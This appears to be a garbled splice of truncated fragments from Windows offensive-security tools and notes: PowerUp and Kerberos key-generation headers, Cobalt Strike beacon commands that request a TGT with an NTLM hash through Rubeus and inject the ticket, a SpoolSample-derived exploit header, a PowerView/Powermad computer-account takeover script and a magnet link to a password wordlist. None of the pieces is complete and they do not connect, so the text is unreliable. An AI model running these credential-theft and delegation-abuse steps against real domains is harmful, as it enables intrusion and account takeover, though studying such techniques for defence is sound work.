# This idea originated from this blog post on Invoke DSC Resources directly:
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/
<#
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
ResourceID = "[Script]ScriptExample";
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";

<#
PowerUp aims to be a clearinghouse of common Windows privilege escalation
vectors that rely on misconfigurations. See README.md for more information.
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
#>

function Get-KerberosAESKey
{
<#
.SYNOPSIS
Generate Kerberos AES 128/256 keys from a known username/hostname, password, and kerberos realm. The
results have been verified against the test values in RFC3962, MS-KILE, and my own test lab.
https://tools.ietf.org/html/rfc3962
https://msdn.microsoft.com/library/cc233855.aspx

# grab a TGT b64 blob with a valid NTLM
beacon> execute-assembly /home/specter/Rubeus_4.5.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
# inject the .kirbi

Function Get-CidrHostCount {
[CmdletBinding()]
Param (
[Parameter(Mandatory)]
[ValidateRange(1,32)]
$Cidr
)
Begin {
} # End Begin.

#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser

/safebrowsing/rd/CltOb12nLW1IbHehcmUtd2hUdmFzEBAY7-0KIOkUDC7h2,/safebrowsing/rd/CINnu27nLO8hbHdfgmUtc2ihdmFyEAcY4|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"

magnet:?xt=urn:btih:827FBFFA925AF95BA20C7C0BA8D35807C1E31C75&dn=Combined_HaveIBeenPwnedWordlists.txt&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80%2fannounce&tr=udp%3a%2f%2ftracker.opentrackr.org%3a1337%2fannounce